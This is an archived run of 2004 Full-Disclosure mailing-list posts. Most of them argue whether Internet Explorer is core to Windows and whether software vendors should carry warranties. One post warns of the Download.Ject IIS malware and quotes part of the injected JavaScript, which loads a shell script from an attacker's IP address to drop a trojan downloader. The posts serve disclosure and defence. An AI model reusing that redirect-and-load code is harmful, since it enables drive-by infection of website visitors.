indexed it, yet... I wonder when the first softie would have noticed this?? ... One final observation, ignoring that has to be escaped in HTML markup (encoded as an HTML entity in this case), this is actually the very smallest of computer errors. I said What a difference a char makes... in my Subject: line, but this is really just a single bit error, as % is 0x25 and 0x26. Would it be too unkind to conclude that MS doesn't care one bit about accuracy? -- Nick FitzGerald Computer Virus Consulting Ltd. Ph/FAX: +64 3 3529854 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
In lines with this email thread and if anyone is interested in playing with an alternate shell... I went poking around and found what looks to be an interesting GNU replacement shell. Note that they specifically point out this isn't for novice users. You can find info at http://lsdocs.shellfront.org/ , http://www.lsdev.org/news.php , and http://www.litestep.net It has build instructions available for VS6/7.1 and Dev-c++/MinGW. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of joe Sent: Wednesday, July 07, 2004 12:20 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] IE Web Browser: Sitting Duck Actually MS does support the use of alternative shells. However you couldn't and shouldn't expect that if you have a say Thunderbird shell that MS would support that shell, just the pinnings under it. Just like they don't support say, Lotus, but they do support the underlying OS API calls. As for breaking things, it goes back to the same DLL point. If an app is built on the concept that that shell would be there and has dependencies on it, yes it will break. The only thing I can say to that is yeah, of course. Most of the GUI admin tools from MS depend on those shell dependencies, again, to that I say... Of course. However if you want to write your own, you can. The Windows API core pieces are still there and fully exposed and you don't have to use the Shell API calls and avoid the Shell DLLs. It will take you a bit longer to write anything though I would expect unless you have already built up your own lib. There are many embedded and POS and other machines running Windows and not using the Explorer shell. They are still called Windows machines. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Barry Fitzgerald Sent: Wednesday, July 07, 2004 9:56 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck joe wrote: It is a core component of the current Windows UI, this is not the same as being a core component of Windows. Explorer is simply a UI shell that sits on the operating system known as Windows. The entire shell is replaceable and has been for a long time, since at least Win3.1. I appreciate the technical explanation even though I knew, well, all and more of it. You probably could have saved some time if you had read my relatively short message fully and seen that I did acknowledge that IE is not part of the kernel (which is really what you're trying to say) and that it's a part of MS Windows as a software distribution. I'm fully aware that you can replace the shell in windows. However, IE and the windows UI is a part of MS Windows as a software distribution and it's an essential part. I dare say that if you remove the UI and DLLs of MS Windows, all you have left is a relatively crappy kernel with a lot of software that won't work. The MS Windows UI and Internet Explorer are a core part of the MS Windows operating system. When you remove them, you break compatibility with many of the available programs and I'd venture to say that Microsoft would not support a highly modified system like the ones that you're describing. One can remove the Glibc from any GNU/Linux distribution. I wish them luck trying to run programs that are dynamically linked. Is the Glibc a core part of Linux the kernel? Of course not. Is the Glibc a core part of the GNU/Linux OS distribution? Yes, it is. I think that for all of the technical explanations that you've given, you're losing the argument on one simple phrase: software distribution. -Barry p.s. Come on people. We went through the what does an OS really constitute? argument back in like 1996. This isn't bloody kindergarten. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
that you could plug a different set of DLLs in as replacements so you could say use another browsers functionality. But then people would complain because their favorite browser couldn't be used because the people writing the browser didn't want to produce the proper exports and blackbox guidelines in the DLLs and go about blaming MS for that. On the nice side though, MS does allow you methods in which to write your own stuff to get around it. Don't like the MMC, write your own interface, I have written many. Don't like the browser, write or download another. Don't like the shell write or download another. This is probably a bit jumpy, I wrote this over the course of the whole day and my mind was on about 1500 different things. I apologize if it is jumpy, but I am not rewriting it irregardless of how jumpy it is. :o) joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Barry Fitzgerald Sent: Tuesday, July 06, 2004 10:28 AM To: joe Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck joe wrote: Couple of things. 1. The conversation you are referring to was a conversation about issues with core base components that necessitated a complete redesign. You kept bringing up items that were NOT core base components - they were UI components. IE being one of them. The very fact that you have a choice to use a different browser should help you understand that. Try to use a different ACL system on Windows NT based systems and tell me how that goes. The choice to use a different browser doesn't imply that IE isn't a core base component at all. Is it a part of the kernel? No... Is it completely unremovable? Of course not... Is it a part of the standard Windows UI? Yes... Is it impossible to remove easily and difficult to remove cleanly? Yes... Will removing it make many programs operate incorrectly? Yes... I think you see where I'm going with this. It's a core component in MS Windows, though it may not be a part of the OS kernel, it is, nonetheless, undebatably, a core component of MS Windows as a software. Keep in mind, IE is more than just a simple executable. The DLLs that it uses are built to be used by other portions of the system and are extensively used. Of course, this is the nature of DLLs. -Barry ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE Web Browser: Sitting Duck
The fun thing with you is that irregardless of what I say, it isn't, in your esteemed opinion, correct. Why? Because you once took to understand something I said as defending Microsoft which is against your very narrow viewpoint so automatically I can't possibly have any valid viewpoint. So, for instance, when I say outright, that the fact IE was sold to a bunch of legal people (see my previous comments on legal type people) as core by MS completely incorrectly in the viewpoint of looking at the OS components technically you still choose to try to harrass. Note I say try. Had that same thing been said by someone posting with some open source email client on *nix you would have been applauding assuming you understand 822. As I mailed to you offlist, any time you are willing to discuss things intelligently, email me. Posts such as the one below simply hurt your cause, whatever in the world that might be. Being Bill Gates would be kind of cool. In those shoes I would sell off every piece of MS I owned that the government would allow and go buy Tahiti or Aruba or both and not touch a computer again. Again, remember, computers aren't about religion, it is a means to an end. Work to live, don't live to work. BTW, it is joe, not JOE - I am case sensitive and you hurt my feelings. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of [EMAIL PROTECTED] Sent: Saturday, July 03, 2004 4:45 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] IE Web Browser: Sitting Duck -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ha ha ha ha ha the dog bites his master he he he he Couple of things Judge: What is this Internet Explorer thing Gates? Bll Gates: Its a core component of the operating sytem ma'am Judge: BULLSHIT GATES! JOE SAYS IT ISN'T Judge: YOUR GUILTY! Bill Gates: oh JUDGE: 6 POSSIBLE SENTENSES, JAIL, FINE, FIX, REPENT, SUSPEND, GO TO JOE SCHOOL OF REHABILITATION joe: you see you see, the judge has given him six options, that means he's not guilty, do you see what I mean. Can you see it can you see it. By the way did I tell you about my last gig, I made a whack of dough off it and now I am sitting on the beach in Taihiti sucking back margaritas. *sigh* I wish I were Bill Gates, he be so cool -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.4 wkYEARECAAYFAkDnGt4ACgkQ9hJzGKhH2LeB8QCfannTbF14n/e2+gsGCHrr8bslFRAA oLNZTgVQWsDJqDtjYdzDoHvDRy89 =HDOv -END PGP SIGNATURE- Concerned about your privacy? Follow this link to get secure FREE email: http://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger http://www.hushmail.com/services-messenger?l=434 Promote security and make money with the Hushmail Affiliate Program: http://www.hushmail.com/about-affiliate?l=427 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Web sites compromised by IIS attack
Heck I wouldn't mind seeing that in just electrical, natural/propane gas, and water services. Delivery of those products is considered a service. Getting that in software is a pipe dream if you can't get it in core services aka utilities such as the ones listed which are considered critical. I also happen to disagree with your conclusion. I think you would find that the software service providers would be more focused on setting up rules under which they will offer you an SLA in terms of what hardware, what software, who modifies the machine. I have been in the computer support industry in various ways for quite a while and almost always working with SLAs. Quality isn't the big thing you see in SLAs, it is holes to get out of having to perform to the SLA level. Dragging lawyers into the software arena is not going to help anything. You want to drag lawyers somewhere, consider some place wet and deep. The legal world is not, in my opinion, making this a better world to live in. Just more lawsuit prone. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gilbert Pilz Sent: Thursday, July 01, 2004 9:52 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Web sites compromised by IIS attack With a software as a service model *combined* *with* measurable and verifiable service level agreements (where breaching the agreement results in refunds or other financial penalties) I think you would find that the service providers would be much more focused on quality and security because they have a direct financial interest in making sure the service remains up and operating correctly. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Name One Web Site Compromised by Download.Ject?
, look around. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gregory A. Gilliss Sent: Wednesday, June 30, 2004 3:31 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Name One Web Site Compromised by Download.Ject? Oh the naivete ... Regardless of the fact that this is full disclosure, does anyone really think that any medium to large business concern wants to make public the fact that their IT infrastructure is vulnerable? Especially in the Fascist Utopia that we call America? Pu-LEEZ! The reason that you have not seen anything is because no one wants to admit that (a) they are vulnerable, (b) their equipment sucks, (c) they employ idiots, (d) seventeen year old hackers are more intelligent/ diligent/ persistent than their US$100,000+ per year IT guru (who's currently in a meeting...please leave a detailed message). As a normal part of any security audit that I perform, I provide the client with a contract that explicitly states that I will not, under penalty of law, divulge the identity of the client to anyone (except maybe the DoJ if they come after me). Companies (infallible as they are) have no desire to publicize their shortcomings. The lack of news regarding victims of this huge gaping hole (HGH) is no conspiracy or coverup. It's called standard operating procedure. If you ever get a job in a corporation, you will become familiar with it. Acadamicians aren't supposed to practice information hiding. However I wonder whether your search would uncover any academic institutions that have suffered a similar fate? BTW, I don't necessarily advocate the silence; I merely understand it. G ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Web sites compromised by IIS attack
List me 5 other products where is it assumed and accepted that the purchased products has flaws. I'll let you list them. List five products that regularly have an add-on sale of extended warranties. If you don't feel there would be a failure, you wouldn't buy an extended warranty. A long time ago in a galaxy far far away I used to sell Electronics, Computers, White Goods, Cars, etc. Extended Warranties are pretty common place to buy. If customers felt there were no flaws, they wouldn't be buying them. If you actually got your wish on the manufacturer has to touch the product physically I think you would see a many things... I don't think you want any of them. 1. Warranty lifetime would reduce to 1 year or less, probably 90 days, that is a pretty common electronics type warranty. Seven day exchange with receipt. 2. You would have very specific hardware guidelines on what could be installed on the machine in order for you to run the OS or program. That hardware would have to be installed at the factory dealer. 3. You would BRING the product into where you purchased it or to a local service center and LEAVE IT, if that service center was not near you you would ship the product properly to that service center. Don't think of this just for your OS, what about every program on the computer. If you installed 10-15-30 things, you could spend a lot of time at UPS. 4. You would lose all control of updates and such that were applied once you brought it in or mailed it in. If the SP from the OS broke 14 of your other apps because they weren't properly using the OS (say taking advantage of a security hole) you now have 14 other apps to go get straightened out... UPS frequent shipper here you come... 5. Costs would go up substantially. Support is one of the most expensive pieces of any company that deals with the public. 6. You may not be allowed to install additional software without voiding your warranty. In fact, yet again, off you go to the factory dealer to get ANY software installed at all. 7. You would probably put out of business hundreds if not thousands of software companies that couldn't handle this support model including tons of open source companies that you personally like. 8. New products would come out much slower and advances in the art would go much slower as companies would be afraid of the costs of putting something out that wasn't pretty darn perfect. Note that perfect is impossible so it could be 8-10-12 years before you see that new version of the game you like. Additionally, the art would be artifically slowed down just so you were always running on known good hardware and software. Look at how many banks and financial institutions still run OS/2 software on old IBM OPT series computers Why? Because it is a known good for their application. That burden of fixing the flawed product is now on the consumer, not the producer. This statement is blatantly incorrect. Are you recoding the broken pieces? Nope. You are installing the fix. Just like if your gateway PC blew a harddrive you would be installing the new harddrive gateway shipped you. Be happy gateway allows you to do that, they could say you have to ship it to them. There is no such thing as perfect software. There is no such thing as perfect anything. Everything has some sort of flaws. Whether any given flaw impacts you or not is another story. Anything made in any volume has a given percentage that is expected to be bad. This is why you can expect to occasionally have bugs in your food and issues in your electronics and bugs in your software. It is a fact of life. The more you are willing to pay, generally the better quality you will get. Look at NASA, go find out how much they paid for the OS and system boards for the Mars rovers. How long did they expect them to last? Contrast that with what you spent and the useful life you are expecting. You want to look at cars, look at the RollsRoyce, the Bentley, the Aston. What do they cost in relation to your Chevy or Ford or Honda? You very rarely hear about RollsRoyce recalls... They must be perfect, especially with how much you pay... Ummm nope. joe -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Frank Knobbe Sent: Thursday, July 01, 2004 11:24 AM To: Denis Dimick Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Web sites compromised by IIS attack Various snippages to chop this down... List me 5 other products where is it assumed and accepted that the purchased products has flaws. That burden of fixing the flawed product is now on the consumer, not the producer. That's what's wrong. The producer should fix the problem, not you. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] New malware to infect IIS and from there jump to clients
For the IIS side
http://www.microsoft.com/security/incident/download_ject.mspx
Microsoft teams are investigating a report of a security issue affecting
customers using Microsoft Internet Information Services 5.0 (IIS) and
Microsoft Internet Explorer, components of Windows.
Important Customers who have deployed Windows XP Service Pack 2 RC2 are not
at risk.
Reports indicate that Web servers running Windows 2000 Server and IIS that
have not applied update 835732, which was addressed by Microsoft Security
Bulletin MS04-011, are possibly being compromised and being used to attempt
to infect users of Internet Explorer with malicious code.
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Peter Kruse
Sent: Thursday, June 24, 2004 7:22 PM
To: [EMAIL PROTECTED]
Subject: [Full-Disclosure] New malware to infect IIS and from there jump to
clients
Hi all,
This is a heads up.
A new malware has been reported from several sources so it appears to be
fairly widespread already.
The malware spreads from infected IIS servers to clients that visit the
webpage of the infected server. How the IIS servers was compromised in the
first place is unfortunately still unknown (any info on that would be
appreciated).
The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
so by running a javascript that apparently gets appended to several files in
the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
217.107.218.147/xxx.html that contains the following code:
script language=Javascript
function InjectedDuringRedirection(){
showModalDialog('md.htm', window, dialog
Top: -1\;dialogLeft:-1\;dialog Height :1\;dialog Width
:1\;).location= java script:'SCRIPT SRC =\\' http://
217.107.218.147/shellxxx.js\\' \ /script';
[snip - you get the picture, right?]
I had to put in some spaces to get past trivial content filtering.
From that point it will try to run the malware in a 1x1 dialogbox in the
following order:
shellscript_loadxxx.js
shellxxx.js
The shellxxx.js will try to drop msits.exe (51.712 bytes) a
trojan-downloader and run it.
Consider to deny access to http://217.107.218.147 in your firewall. This
will at least prevent client PCs from getting infected.
Further information can be found in the daily log from SANS:
http://isc.sans.org/
Regards
Peter Kruse
http://www.csis.dk
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] New Worm Discovery - Potential Korgo Variant
Kaspersky detect it as Backdoor.Agobot.gen. So another one of the many other Agobot variants. Michael Young wrote: Yesterday a large client of ours was taken down by what appears to be a Korgo variant, but I have been unable to locate any information on this worm. From what we have discovered, the main process is VDisp.exe. It is spreading through unpatched systems vulnerable to the LSASS exploit, and propagates itself through a serious of randomly chosen ports. The worm creates randomly generated services that initialize the process, and also creates a registry entry in RunServices and Run to load. I am anxious to hear any feedback anyone has regarding this issue as we are still attempting to reduce network traffic and alleviate any remaining issues. I have attached a copy of the executable (rename to .exe). Thank you, Michael Young IT Consultant Miles Technologies (800)-496-8001 ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
